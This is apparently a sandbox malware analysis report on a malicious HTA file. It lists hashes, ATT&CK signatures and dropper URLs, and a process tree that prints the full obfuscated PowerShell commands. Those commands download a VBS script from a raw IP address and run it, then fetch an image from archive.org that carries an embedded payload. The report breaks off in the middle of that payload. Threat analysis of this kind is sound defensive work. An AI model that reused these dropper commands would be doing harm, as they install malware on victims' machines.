3ee7cd63e826153e5334bcad95e91de9054286c5503b78ad03febe50eca26853

Analysis

max time kernel
118s
max time network
119s
platform
windows7_x64
resource
win7-20240704-en
resource tags

arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
submitted
27-08-2024 05:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6c8ac4c656d98ff4280887b23258ecd6.hta
Size

114KB
MD5

6c8ac4c656d98ff4280887b23258ecd6
SHA1

589a5b57c1046c73dbf880fb089efd11388cc529
SHA256

3ee7cd63e826153e5334bcad95e91de9054286c5503b78ad03febe50eca26853
SHA512

58db3dd717d2e0be19f1f73bda851f785df7cc04733c19ba98c575ef865b31e37ea56e6c71c1856e75e8b878a833124a8b96e5578ba83e6c8467edc508cbf949
SSDEEP

96:Ea+M7+yhfLMVeeyhftGMVxFX3At4FgRbOyhfUZyhf93hFMVJhyhf2AT:Ea+Q1hfBVhfZefhfHhfDhfVT

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg

exe.dropper

https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
4	2328	powershell.exe
6	1984	powershell.exe
7	1984	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2196	powershell.exe
1984	powershell.exe

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
2200	cmd.exe
2328	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
2328	powershell.exe
2328	powershell.exe
2328	powershell.exe
2196	powershell.exe
1984	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2328	powershell.exe
Token: SeDebugPrivilege	2196	powershell.exe
Token: SeDebugPrivilege	1984	powershell.exe

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 1748 wrote to memory of 2200	1748	mshta.exe	30
PID 1748 wrote to memory of 2200	1748	mshta.exe	30
PID 1748 wrote to memory of 2200	1748	mshta.exe	30
PID 1748 wrote to memory of 2200	1748	mshta.exe	30
PID 2200 wrote to memory of 2328	2200	cmd.exe	32
PID 2200 wrote to memory of 2328	2200	cmd.exe	32
PID 2200 wrote to memory of 2328	2200	cmd.exe	32
PID 2200 wrote to memory of 2328	2200	cmd.exe	32
PID 2328 wrote to memory of 2844	2328	powershell.exe	33
PID 2328 wrote to memory of 2844	2328	powershell.exe	33
PID 2328 wrote to memory of 2844	2328	powershell.exe	33
PID 2328 wrote to memory of 2844	2328	powershell.exe	33
PID 2844 wrote to memory of 2752	2844	csc.exe	34
PID 2844 wrote to memory of 2752	2844	csc.exe	34
PID 2844 wrote to memory of 2752	2844	csc.exe	34
PID 2844 wrote to memory of 2752	2844	csc.exe	34
PID 2328 wrote to memory of 2640	2328	powershell.exe	36
PID 2328 wrote to memory of 2640	2328	powershell.exe	36
PID 2328 wrote to memory of 2640	2328	powershell.exe	36
PID 2328 wrote to memory of 2640	2328	powershell.exe	36
PID 2640 wrote to memory of 2196	2640	WScript.exe	37
PID 2640 wrote to memory of 2196	2640	WScript.exe	37
PID 2640 wrote to memory of 2196	2640	WScript.exe	37
PID 2640 wrote to memory of 2196	2640	WScript.exe	37
PID 2196 wrote to memory of 1984	2196	powershell.exe	39
PID 2196 wrote to memory of 1984	2196	powershell.exe	39
PID 2196 wrote to memory of 1984	2196	powershell.exe	39
PID 2196 wrote to memory of 1984	2196	powershell.exe	39

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\6c8ac4c656d98ff4280887b23258ecd6.hta"
1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1748
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/C POwerSHelL.eXe -Ex BYpaSS -nOP -W 1 -C DevicEcREdENTIAlDEploYmEnt.exe ; iEx($(iEx('[syStEm.TeXt.eNCODing]'+[ChaR]58+[CHAR]58+'UTF8.gEtSTrInG([sysTem.cONvERT]'+[chAR]58+[cHar]58+'frOmbAsE64STrinG('+[CHaR]0x22+'JEZIZ3d1OWRVSE1PICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJlUmRFRmlOSXRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1Umxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ1BRSUNlRFQsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcVZ6LHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJBRixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJ5bSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJNaGFUV1hIWVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaeGR5WGRWYmkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRGSGd3dTlkVUhNTzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNTUveGFtcHAvbWV1L2NyZWF0ZWRiZWF1dHlpbmJ1dHRlcnNvY2hiaXNjdXQudElGIiwiJEVudjpBUFBEQVRBXGNyZWF0ZWRiZWF1dHlpbmJ1dHRlcnNvY2hiaXNjdS52QlMiLDAsMCk7U3RBUlQtc0xFZVAoMyk7U1RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlZGJlYXV0eWluYnV0dGVyc29jaGJpc2N1LnZCUyI='+[CHar]0X22+'))')))"
  2⤵
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2200
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    POwerSHelL.eXe -Ex BYpaSS -nOP -W 1 -C DevicEcREdENTIAlDEploYmEnt.exe ; iEx($(iEx('[syStEm.TeXt.eNCODing]'+[ChaR]58+[CHAR]58+'UTF8.gEtSTrInG([sysTem.cONvERT]'+[chAR]58+[cHar]58+'frOmbAsE64STrinG('+[CHaR]0x22+'JEZIZ3d1OWRVSE1PICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJlUmRFRmlOSXRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1Umxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ1BRSUNlRFQsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcVZ6LHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJBRixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJ5bSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJNaGFUV1hIWVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaeGR5WGRWYmkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRGSGd3dTlkVUhNTzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNTUveGFtcHAvbWV1L2NyZWF0ZWRiZWF1dHlpbmJ1dHRlcnNvY2hiaXNjdXQudElGIiwiJEVudjpBUFBEQVRBXGNyZWF0ZWRiZWF1dHlpbmJ1dHRlcnNvY2hiaXNjdS52QlMiLDAsMCk7U3RBUlQtc0xFZVAoMyk7U1RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlZGJlYXV0eWluYnV0dGVyc29jaGJpc2N1LnZCUyI='+[CHar]0X22+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2328
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gda0rpyd.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2844
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES930D.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC930C.tmp"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2752
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\createdbeautyinbuttersochbiscu.vBS"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2640
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J⤙ ⧺ ¤ ❠ ❘Bp⤙ ⧺ ¤ ❠ ❘G0⤙ ⧺ ¤ ❠ ❘YQBn⤙ ⧺ ¤ ❠ ❘GU⤙ ⧺ ¤ ❠ ❘VQBy⤙ ⧺ ¤ ❠ ❘Gw⤙ ⧺ ¤ ❠ ❘I⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘9⤙ ⧺ ¤ ❠ ❘C⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘JwBo⤙ ⧺ ¤ ❠ ❘HQ⤙ ⧺ ¤ ❠ ❘d⤙ ⧺ ¤ ❠ ❘Bw⤙ ⧺ ¤ ❠ ❘HM⤙ ⧺ ¤ ❠ ❘Og⤙ ⧺ ¤ ❠ ❘v⤙ ⧺ ¤ ❠ ❘C8⤙ ⧺ ¤ ❠ ❘aQBh⤙ ⧺ ¤ ❠ ❘Dg⤙ ⧺ ¤ ❠ ❘M⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘z⤙ ⧺ ¤ ❠ ❘DE⤙ ⧺ ¤ ❠ ❘M⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘0⤙ ⧺ ¤ ❠ ❘C4⤙ ⧺ ¤ ❠ ❘dQBz⤙ ⧺ ¤ ❠ ❘C4⤙ ⧺ ¤ ❠ ❘YQBy⤙ ⧺ ¤ ❠ ❘GM⤙ ⧺ ¤ ❠ ❘a⤙ ⧺ ¤ ❠ ❘Bp⤙ ⧺ ¤ ❠ ❘HY⤙ ⧺ ¤ ❠ ❘ZQ⤙ ⧺ ¤ ❠ ❘u⤙ ⧺ ¤ ❠ ❘G8⤙ ⧺ ¤ ❠ ❘cgBn⤙ ⧺ ¤ ❠ ❘C8⤙ ⧺ ¤ ❠ ❘Mg⤙ ⧺ ¤ ❠ ❘3⤙ ⧺ ¤ ❠ ❘C8⤙ ⧺ ¤ ❠ ❘aQB0⤙ ⧺ ¤ ❠ ❘GU⤙ ⧺ ¤ ❠ ❘bQBz⤙ ⧺ ¤ ❠ ❘C8⤙ ⧺ ¤ ❠ ❘dgBi⤙ ⧺ ¤ ❠ ❘HM⤙ ⧺ ¤ ❠ ❘Xw⤙ ⧺ ¤ ❠ ❘y⤙ ⧺ ¤ ❠ ❘D⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘Mg⤙ ⧺ ¤ ❠ ❘0⤙ ⧺ ¤ ❠ ❘D⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘Nw⤙ ⧺ ¤ ❠ ❘y⤙ ⧺ ¤ ❠ ❘DY⤙ ⧺ ¤ ❠ ❘Xw⤙ ⧺ ¤ ❠ ❘y⤙ ⧺ ¤ ❠ ❘D⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘Mg⤙ ⧺ ¤ ❠ ❘0⤙ ⧺ ¤ ❠ ❘D⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘Nw⤙ ⧺ ¤ ❠ ❘y⤙ ⧺ ¤ ❠ ❘DY⤙ ⧺ ¤ ❠ ❘LwB2⤙ ⧺ ¤ ❠ ❘GI⤙ ⧺ ¤ ❠ ❘cw⤙ ⧺ ¤ ❠ ❘u⤙ ⧺ ¤ ❠ ❘Go⤙ ⧺ ¤ ❠ ❘c⤙ ⧺ ¤ ❠ ❘Bn⤙ ⧺ ¤ ❠ ❘Cc⤙ ⧺ ¤ ❠ ❘Ow⤙ ⧺ ¤ ❠ ❘k⤙ ⧺ ¤ ❠ ❘Hc⤙ ⧺ ¤ ❠ ❘ZQBi⤙ ⧺ ¤ ❠ ❘EM⤙ ⧺ ¤ ❠ ❘b⤙ ⧺ ¤ ❠ ❘Bp⤙ ⧺ ¤ ❠ ❘GU⤙ ⧺ ¤ ❠ ❘bgB0⤙ ⧺ ¤ ❠ ❘C⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘PQ⤙ ⧺ ¤ ❠ ❘g⤙ ⧺ ¤ ❠ ❘E4⤙ ⧺ ¤ ❠ ❘ZQB3⤙ ⧺ ¤ ❠ ❘C0⤙ ⧺ ¤ ❠ ❘TwBi⤙ ⧺ ¤ ❠ ❘Go⤙ ⧺ ¤ ❠ ❘ZQBj⤙ ⧺ ¤ ❠ ❘HQ⤙ ⧺ ¤ ❠ ❘I⤙ ⧺ ¤ ❠ ❘BT⤙ ⧺ ¤ ❠ ❘Hk⤙ ⧺ ¤ ❠ ❘cwB0⤙ ⧺ ¤ ❠ ❘GU⤙ ⧺ ¤ ❠ ❘bQ⤙ ⧺ ¤ ❠ ❘u⤙ ⧺ ¤ ❠ ❘E4⤙ ⧺ ¤ ❠ ❘ZQB0⤙ ⧺ ¤ ❠ ❘C4⤙ ⧺ ¤ ❠ ❘VwBl⤙ ⧺ ¤ ❠ ❘GI⤙ ⧺ ¤ ❠ ❘QwBs⤙ ⧺ ¤ ❠ ❘Gk⤙ ⧺ ¤ ❠ ❘ZQBu⤙ ⧺ ¤ ❠ ❘HQ⤙ ⧺ ¤ ❠ ❘Ow⤙ ⧺ ¤ ❠ ❘k⤙ ⧺ ¤ ❠ ❘Gk⤙ ⧺ ¤ ❠ ❘bQBh⤙ ⧺ ¤ ❠ ❘Gc⤙ ⧺ ¤ ❠ ❘ZQBC⤙ ⧺ ¤ ❠ ❘Hk⤙ ⧺ ¤ ❠ ❘d⤙ ⧺ ¤ ❠ ❘Bl⤙ ⧺ ¤ ❠ ❘HM⤙ ⧺ ¤ ❠ ❘I⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘9⤙ ⧺ ¤ ❠ ❘C⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘J⤙ ⧺ ¤ ❠ ❘B3⤙ ⧺ ¤ ❠ ❘GU⤙ ⧺ ¤ ❠ ❘YgBD⤙ ⧺ ¤ ❠ ❘Gw⤙ ⧺ ¤ ❠ ❘aQBl⤙ ⧺ ¤ ❠ ❘G4⤙ ⧺ ¤ ❠ ❘d⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘u⤙ ⧺ ¤ ❠ ❘EQ⤙ ⧺ ¤ ❠ ❘bwB3⤙ ⧺ ¤ ❠ ❘G4⤙ ⧺ ¤ ❠ ❘b⤙ ⧺ ¤ ❠ ❘Bv⤙ ⧺ ¤ ❠ ❘GE⤙ ⧺ ¤ ❠ ❘Z⤙ ⧺ ¤ ❠ ❘BE⤙ ⧺ ¤ ❠ ❘GE⤙ ⧺ ¤ ❠ ❘d⤙ ⧺ ¤ ❠ ❘Bh⤙ ⧺ ¤ ❠ ❘Cg⤙ ⧺ ¤ ❠ ❘J⤙ ⧺ ¤ ❠ ❘Bp⤙ ⧺ ¤ ❠ ❘G0⤙ ⧺ ¤ ❠ ❘YQBn⤙ ⧺ ¤ ❠ ❘GU⤙ ⧺ ¤ ❠ ❘VQBy⤙ ⧺ ¤ ❠ ❘Gw⤙ ⧺ ¤ ❠ ❘KQ⤙ ⧺ ¤ ❠ ❘7⤙ ⧺ ¤ ❠ ❘CQ⤙ ⧺ ¤ ❠ ❘aQBt⤙ ⧺ ¤ ❠ ❘GE⤙ ⧺ ¤ ❠ ❘ZwBl⤙ ⧺ ¤ ❠ ❘FQ⤙ ⧺ ¤ ❠ ❘ZQB4⤙ ⧺ ¤ ❠ ❘HQ⤙ ⧺ ¤ ❠ ❘I⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘9⤙ ⧺ ¤ ❠ ❘C⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘WwBT⤙ ⧺ ¤ ❠ ❘Hk⤙ ⧺ ¤ ❠ ❘cwB0⤙ ⧺ ¤ ❠ ❘GU⤙ ⧺ ¤ ❠ ❘bQ⤙ ⧺ ¤ ❠ ❘u⤙ ⧺ ¤ ❠ ❘FQ⤙ ⧺ ¤ ❠ ❘ZQB4⤙ ⧺ ¤ ❠ ❘HQ⤙ ⧺ ¤ ❠ ❘LgBF⤙ ⧺ ¤ ❠ ❘G4⤙ ⧺ ¤ ❠ ❘YwBv⤙ ⧺ ¤ ❠ ❘GQ⤙ ⧺ ¤ ❠ ❘aQBu⤙ ⧺ ¤ ❠ ❘Gc⤙ ⧺ ¤ ❠ ❘XQ⤙ ⧺ ¤ ❠ ❘6⤙ ⧺ ¤ ❠ ❘Do⤙ ⧺ ¤ ❠ ❘VQBU⤙ ⧺ ¤ ❠ ❘EY⤙ ⧺ ¤ ❠ ❘O⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘u⤙ ⧺ ¤ ❠ ❘Ec⤙ ⧺ ¤ ❠ ❘ZQB0⤙ ⧺ ¤ ❠ ❘FM⤙ ⧺ ¤ ❠ ❘d⤙ ⧺ ¤ ❠ ❘By⤙ ⧺ ¤ ❠ ❘Gk⤙ ⧺ ¤ ❠ ❘bgBn⤙ ⧺ ¤ ❠ ❘Cg⤙ ⧺ ¤ ❠ ❘J⤙ ⧺ ¤ ❠ ❘Bp⤙ ⧺ ¤ ❠ ❘G0⤙ ⧺ ¤ ❠ ❘YQBn⤙ ⧺ ¤ ❠ ❘GU⤙ ⧺ ¤ ❠ ❘QgB5⤙ ⧺ ¤ ❠ ❘HQ⤙ ⧺ ¤ ❠ ❘ZQBz⤙ ⧺ ¤ ❠ ❘Ck⤙ ⧺ ¤ ❠ ❘Ow⤙ ⧺ ¤ ❠ ❘k⤙ ⧺ ¤ ❠ ❘HM⤙ ⧺ ¤ ❠ ❘d⤙ ⧺ ¤ ❠ ❘Bh⤙ ⧺ ¤ ❠ ❘HI⤙ ⧺ ¤ ❠ ❘d⤙ ⧺ ¤ ❠ ❘BG⤙ ⧺ ¤ ❠ ❘Gw⤙ ⧺ ¤ ❠ ❘YQBn⤙ ⧺ ¤ ❠ ❘C⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘PQ⤙ ⧺ ¤ ❠ ❘g⤙ ⧺ ¤ ❠ ❘Cc⤙ ⧺ ¤ ❠ ❘P⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘8⤙ ⧺ ¤ ❠ ❘EI⤙ ⧺ ¤ ❠ ❘QQBT⤙ ⧺ ¤ ❠ ❘EU⤙ ⧺ ¤ ❠ ❘Ng⤙ ⧺ ¤ ❠ ❘0⤙ ⧺ ¤ ❠ ❘F8⤙ ⧺ ¤ ❠ ❘UwBU⤙ ⧺ ¤ ❠ ❘EE⤙ ⧺ ¤ ❠ ❘UgBU⤙ ⧺ ¤ ❠ ❘D4⤙ ⧺ ¤ ❠ ❘Pg⤙ ⧺ ¤ ❠ ❘n⤙ ⧺ ¤ ❠ ❘Ds⤙ ⧺ ¤ ❠ ❘J⤙ ⧺ ¤ ❠ ❘Bl⤙ ⧺ ¤ ❠ ❘G4⤙ ⧺ ¤ ❠ ❘Z⤙ ⧺ ¤ ❠ ❘BG⤙ ⧺ ¤ ❠ ❘Gw⤙ ⧺ ¤ ❠ ❘YQBn⤙ ⧺ ¤ ❠ ❘C⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘PQ⤙ ⧺ ¤ ❠ ❘g⤙ ⧺ ¤ ❠ ❘Cc⤙ ⧺ ¤ ❠ ❘P⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘8⤙ ⧺ ¤ ❠ ❘EI⤙ ⧺ ¤ ❠ ❘QQBT⤙ ⧺ ¤ ❠ ❘EU⤙ ⧺ ¤ ❠ ❘Ng⤙ ⧺ ¤ ❠ ❘0⤙ ⧺ ¤ ❠ ❘F8⤙ ⧺ ¤ ❠ ❘RQBO⤙ ⧺ ¤ ❠ ❘EQ⤙ ⧺ ¤ ❠ ❘Pg⤙ ⧺ ¤ ❠ ❘+⤙ ⧺ ¤ ❠ ❘Cc⤙ ⧺ ¤ ❠ ❘Ow⤙ ⧺ ¤ ❠ ❘k⤙ ⧺ ¤ ❠ ❘HM⤙ ⧺ ¤ ❠ ❘d⤙ ⧺ ¤ ❠ ❘Bh⤙ ⧺ ¤ ❠ ❘HI⤙ ⧺ ¤ ❠ ❘d⤙ ⧺ ¤ ❠ ❘BJ⤙ ⧺ ¤ ❠ ❘G4⤙ ⧺ ¤ ❠ ❘Z⤙ ⧺ ¤ ❠ ❘Bl⤙ ⧺ ¤ ❠ ❘Hg⤙ ⧺ ¤ ❠ ❘I⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘9⤙ ⧺ ¤ ❠ ❘C⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘J⤙ ⧺ ¤ ❠ ❘Bp⤙ ⧺ ¤ ❠ ❘G0⤙ ⧺ ¤ ❠ ❘YQBn⤙ ⧺ ¤ ❠ ❘GU⤙ ⧺ ¤ ❠ ❘V⤙ ⧺ ¤ ❠ ❘Bl⤙ ⧺ ¤ ❠ ❘Hg⤙ ⧺ ¤ ❠ ❘d⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘u⤙ ⧺ ¤ ❠ ❘Ek⤙ ⧺ ¤ ❠ ❘bgBk⤙ ⧺ ¤ ❠ ❘GU⤙ ⧺ ¤ ❠ ❘e⤙ ⧺ ¤ ❠ ❘BP⤙ ⧺ ¤ ❠ ❘GY⤙ ⧺ ¤ ❠ ❘K⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘k⤙ ⧺ ¤ ❠ ❘HM⤙ ⧺ ¤ ❠ ❘d⤙ ⧺ ¤ ❠ ❘Bh⤙ ⧺ ¤ ❠ ❘HI⤙ ⧺ ¤ ❠ ❘d⤙ ⧺ ¤ ❠ ❘BG⤙ ⧺ ¤ ❠ ❘Gw⤙ ⧺ ¤ ❠ ❘YQBn⤙ ⧺ ¤ ❠ ❘Ck⤙ ⧺ ¤ ❠ ❘Ow⤙ ⧺ ¤ ❠ ❘k⤙ ⧺ ¤ ❠ ❘GU⤙ ⧺ ¤ ❠ ❘bgBk⤙ ⧺ ¤ ❠ ❘Ek⤙ ⧺ ¤ ❠ ❘bgBk⤙ ⧺ ¤ ❠ ❘GU⤙ ⧺ ¤ ❠ ❘e⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘g⤙ ⧺ ¤ ❠ ❘D0⤙ ⧺ ¤ ❠ ❘I⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘k⤙ ⧺ ¤ ❠ ❘Gk⤙ ⧺ ¤ ❠ ❘bQBh⤙ ⧺ ¤ ❠ ❘Gc⤙ ⧺ ¤ ❠ ❘ZQBU⤙ ⧺ ¤ ❠ ❘GU⤙ ⧺ ¤ ❠ ❘e⤙ ⧺ ¤ ❠ ❘B0⤙ ⧺ ¤ ❠ ❘C4⤙ ⧺ ¤ ❠ ❘SQBu⤙ ⧺ ¤ ❠ ❘GQ⤙ ⧺ ¤ ❠ ❘ZQB4⤙ ⧺ ¤ ❠ ❘E8⤙ ⧺ ¤ ❠ ❘Zg⤙ ⧺ ¤ ❠ ❘o⤙ ⧺ ¤ ❠ ❘CQ⤙ ⧺ ¤ ❠ ❘ZQBu⤙ ⧺ ¤ ❠ ❘GQ⤙ ⧺ ¤ ❠ ❘RgBs⤙ ⧺ ¤ ❠ ❘GE⤙ ⧺ ¤ ❠ ❘Zw⤙ ⧺ ¤ ❠ ❘p⤙ ⧺ ¤ ❠ ❘Ds⤙ ⧺ ¤ ❠ ❘J⤙ ⧺ ¤ ❠ ❘Bz⤙ ⧺ ¤ ❠ ❘HQ⤙ ⧺ ¤ ❠ ❘YQBy⤙ ⧺ ¤ ❠ ❘HQ⤙ ⧺ ¤ ❠ ❘SQBu⤙ ⧺ ¤ ❠ ❘GQ⤙ ⧺ ¤ ❠ ❘ZQB4⤙ ⧺ ¤ ❠ ❘C⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘LQBn⤙ ⧺ ¤ ❠ ❘GU⤙ ⧺ ¤ ❠ ❘I⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘w⤙ ⧺ ¤ ❠ ❘C⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘LQBh⤙ ⧺ ¤ ❠ ❘G4⤙ ⧺ ¤ ❠ ❘Z⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘g⤙ ⧺ ¤ ❠ ❘CQ⤙ ⧺ ¤ ❠ ❘ZQBu⤙ ⧺ ¤ ❠ ❘GQ⤙ ⧺ ¤ ❠ ❘SQBu⤙ ⧺ ¤ ❠ ❘GQ⤙ ⧺ ¤ ❠ ❘ZQB4⤙ ⧺ ¤ ❠ ❘C⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘LQBn⤙ ⧺ ¤ ❠ ❘HQ⤙ ⧺ ¤ ❠ ❘I⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘k⤙ ⧺ ¤ ❠ ❘HM⤙ ⧺ ¤ ❠ ❘d⤙ ⧺ ¤ ❠ ❘Bh⤙ ⧺ ¤ ❠ ❘HI⤙ ⧺ ¤ ❠ ❘d⤙ ⧺ ¤ ❠ ❘BJ⤙ ⧺ ¤ ❠ ❘G4⤙ ⧺ ¤ 